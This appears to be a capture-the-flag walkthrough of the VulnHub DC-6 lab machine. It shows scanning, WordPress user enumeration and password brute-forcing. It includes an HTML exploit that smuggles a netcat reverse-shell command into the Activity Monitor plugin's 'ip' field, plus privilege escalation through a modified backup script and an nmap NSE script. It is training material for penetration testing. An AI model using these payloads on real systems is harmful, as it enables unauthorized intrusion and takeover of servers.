DC:6

DC-6 is an easy, oscp preparation machine from vulnhub. I have enjoyed the process of manual exploitation.

The developer of this machine added some instruction and hints in vulnhub description. First, add the IP in your /etc/hosts file. Another one is a hint for password attack

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

Network Scanning:

1. To start attack, we need IP address. So I have used Netdiscover :

netdiscover -i eth0 -r 10.0.2.0/24

Target IP: 10.0.2.8

2. Before attack, its a good strategy to scan all port. Rustscan is a very fast scanner for this job: rustscan -a 10.0.2.8 --range 1-65535

Output:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

There are 2 ports open. Nmap port scan can now show some more information:

nmap -sS -sV -O -p 22,80 -v 10.0.2.8

Output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

Enumeration:

I have added the IP in my /etc/hosts

3. There is a web service running at port 80. The site says, it's a WordPress site.

Wpscan is perfect to scan this site : wpscan --url http://wordy/ --enumerate

Output:

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

From the scan output, I can get some username. With the Vulnhub hints, I have a password list also. So scanning with credential shows some more info:

wpscan -U user.txt -P PASS_DC.txt --url http://wordy/

Output: (login credential found)

[!] Valid Combinations Found:
 | Username: mark, Password: helpdesk01

I can login with this username and password.

4. Now there is nothing interesting. After some exploring, I have found only the 'Active monitor' plugin is running there. Instant googling shows that, this has an exploit available : https://www.exploit-db.com/exploits/45274

Exploitation

5. This plugin has a command injection vulnerability. I need to modify the exploit as my IP and port is different. Another thing is, I have changed the netcat reverse shell command also. Because the default command was not working properly. Exploit: (save it as .html and run)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart>
      <input type="hidden" name="ip" value="google.fr| nc -e /bin/bash 10.0.2.4 4040" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

6. To get a shell, I have started a listener in my machine. Executed the exploit and got a connection

nc -lvnp 4040

upgraded the shell with python:

python -c 'import pty; pty.spawn("/bin/sh")'

Post Exploitation:

7. After some manual exploration of available files, I have found new user credential : graham - GSo7isUM1D4

8. SSH connection available for graham and I can login

9. To escalate my privilege, I started manual enumeration. Permission check shows - editable .sh file and vulnerable Debian version.

10. Local privilege escalation exploit available for this version: https://www.exploit-db.com/exploits/41240

11. I can modify backup.sh file. So after modifym excuting it gives me jens access

#!/bin/bash
tar -czf backups.tar.gz /var/www/html
/bin/bash

Executing the script and Jens permission info:

12. Jens can run nmap. In order to get root shell, I have tried to run nmap in interactive mode. But it's not available there.

13. Creating nmap nse to execute bash command:

echo 'os.execute("/bin/sh")' > /tmp/root.nse

/tmp is a good option to save new file because sometime there is no restriction to create new file. And I can run my nmap script. After running the command, terminal do not echo back my command so I had to type blindly and got the root flag

This was a very good practice of manual exploitation and privilege escalation. Thanks to @DCAU7